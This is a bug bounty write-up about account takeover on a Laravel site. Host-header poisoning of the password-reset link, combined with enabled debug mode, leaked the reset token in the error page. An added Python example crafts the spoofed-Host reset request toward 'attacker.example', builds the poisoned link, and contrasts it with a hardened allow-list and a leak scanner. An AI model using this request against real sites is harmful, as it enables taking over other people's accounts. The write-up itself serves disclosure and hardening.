Full Account Takeover through Enabled Laravel Debug Mode

Z3d~
2 min read · Mar 4, 2021

Hey folks,

About a month ago I was hunting on a private bug bounty program on Bugcrowd, so I will call it (redacted). As usual, while doing recon a subdomain caught my attention. Once I visited it, Wappalyzer showed the word "Laravel", which made me think about debug mode in the Laravel framework …

First I thought about how to force that debug page to appear.

I fired up Burp and started playing with the requests. After a little while I tried replacing the Host header with a host of my own. Nothing obviously broke, but the application redirected me to my host, and an idea quickly came to mind.

I said to myself: what if I changed the Host header on the reset password functionality? Maybe I could manipulate the reset password link. What happened was not what I expected.

When I changed the Host header, the Laravel error page disclosed the password reset link that should have been sent to me, or to any user whose email I submitted. Laravel generates absolute URLs from the incoming request's host unless the application forces its root URL or restricts which hosts it trusts, so the link was built with my host; and because debug mode was enabled, the exception page dumped that link, reset token included, straight into the HTTP response instead of leaving it in the victim's inbox.

Now I could reset the password of any user. Two misconfigurations combined here: APP_DEBUG left enabled in production, and URL generation that trusted whatever Host header the client sent.
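The flow described above, as an added example that is not part of the original post or of the target application: it crafts the reset request with a spoofed Host header, shows how a link builder that trusts the Host header produces a poisoned link, shows the hardened variant that rejects unknown hosts (the idea behind Laravel's TrustHosts middleware and a forced APP_URL), and scans a response body for reset links pointing at the attacker's host. The hostnames, the reset paths, the token and the sample debug response are all constructed assumptions for illustration.

```python
import re
from urllib.parse import quote, urlsplit

# Assumption: the application's one legitimate host (constructed for the example).
TRUSTED_HOSTS = {"app.example.com"}


def build_reset_link(host_header, token, email, trusted_hosts=None):
    """Build a password-reset URL the way a framework does when it derives
    the absolute URL from the incoming Host header.

    With trusted_hosts=None this is deliberately vulnerable: whatever host the
    client sent ends up in the link. Passing an allow-list models the hardened
    behaviour: a request for an unknown host is rejected before any link exists.
    """
    host = host_header.strip().lower()
    if trusted_hosts is not None and host not in trusted_hosts:
        raise ValueError(f"untrusted Host header: {host}")
    # Assumed reset route; Laravel's default scaffolding uses a similar shape.
    return f"https://{host}/password/reset/{token}?email={quote(email, safe='')}"


def craft_reset_request(path, spoofed_host, email):
    """Return the raw HTTP/1.1 request sent to the reset-password endpoint with
    an attacker-controlled Host header (the Burp step in the write-up)."""
    body = f"email={quote(email, safe='')}"
    return (
        f"POST {path} HTTP/1.1\r\n"
        f"Host: {spoofed_host}\r\n"
        "Content-Type: application/x-www-form-urlencoded\r\n"
        f"Content-Length: {len(body)}\r\n"
        "\r\n"
        f"{body}"
    )


# Absolute URLs whose path contains the reset route; stops at quotes/tags.
_RESET_URL = re.compile(r"https?://[^\s\"'<>\\]+/password/reset/[^\s\"'<>\\]+")


def find_leaked_reset_links(response_body, attacker_host):
    """Scan a response (e.g. a debug/exception page) for reset links whose
    host is the attacker's: links that were poisoned and then leaked."""
    return [
        url for url in _RESET_URL.findall(response_body)
        if urlsplit(url).hostname == attacker_host.lower()
    ]


# Constructed sample of what a debug page might dump when mail sending fails.
# It is NOT a capture from the program in the write-up.
SAMPLE_DEBUG_RESPONSE = """<h1>Exception while sending mail</h1>
<pre>
  #3 /var/www/app/Notifications/ResetPassword.php(45): ...
     'url' =&gt; 'https://attacker.example/password/reset/7f3c9e0b2a?email=victim%40example.com',
</pre>
"""


def demo(attacker_host="attacker.example", victim="victim@example.com"):
    """Run the whole flow and return the artefacts of each step."""
    request = craft_reset_request("/password/email", attacker_host, victim)
    poisoned = build_reset_link(attacker_host, "7f3c9e0b2a", victim)
    try:
        build_reset_link(attacker_host, "7f3c9e0b2a", victim, TRUSTED_HOSTS)
        blocked = False
    except ValueError:
        blocked = True
    leaked = find_leaked_reset_links(SAMPLE_DEBUG_RESPONSE, attacker_host)
    return {
        "request": request,
        "poisoned_link": poisoned,
        "blocked_when_hardened": blocked,
        "leaked_links": leaked,
    }


if __name__ == "__main__":
    for name, value in demo().items():
        print(f"{name}: {value!r}")
```

Without debug mode, a poisoned link would still have to be clicked by the victim before the token reached the attacker; the debug page removed that step by printing the link in the response. The fixes are independent and both needed: set APP_DEBUG=false in production, and restrict URL generation to known hosts (TrustHosts middleware or a forced root URL) so the Host header cannot shape links in the first place.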

Cheers
